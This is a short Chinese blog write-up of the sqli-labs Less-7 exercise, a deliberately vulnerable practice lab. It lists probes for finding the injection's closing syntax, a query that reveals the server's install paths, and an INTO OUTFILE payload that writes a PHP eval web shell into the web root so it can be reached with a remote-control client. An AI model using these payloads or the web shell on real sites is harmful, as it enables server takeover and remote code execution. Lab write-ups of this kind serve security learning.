SQL-libs Less-7

 知识点:

select……into outfile 'file_name'  导入文件。

?id=1

?id=1"

?id=1'

?id=1')

?id=1'))

?id=1'))--+

 闭合方式可能是 '))

查看用户是否有file权限。

?id=1')) and (select count(*) from mysql.user)>0--+

从 Less 7 是没办法得知路径,所以转去Less1获取文件路径。

?id=' union select  1,@@basedir,@@datadir --+

尝试写入文件

最最最重要的事情就是不要去手动创建你要写入的文件,让它自己生成,该问题曾导致我一晚上都在各种找原因。切记切记!!!

?id=1?id=1')) union select 1,2,'password' into outfile "D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php"--+

虽然报错了,但是还是生成了我需要的1.php。

 

<?php @eval($_POST["pass"]);?>

用一句话木马代替我们写入的信息

 使用菜刀链接。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值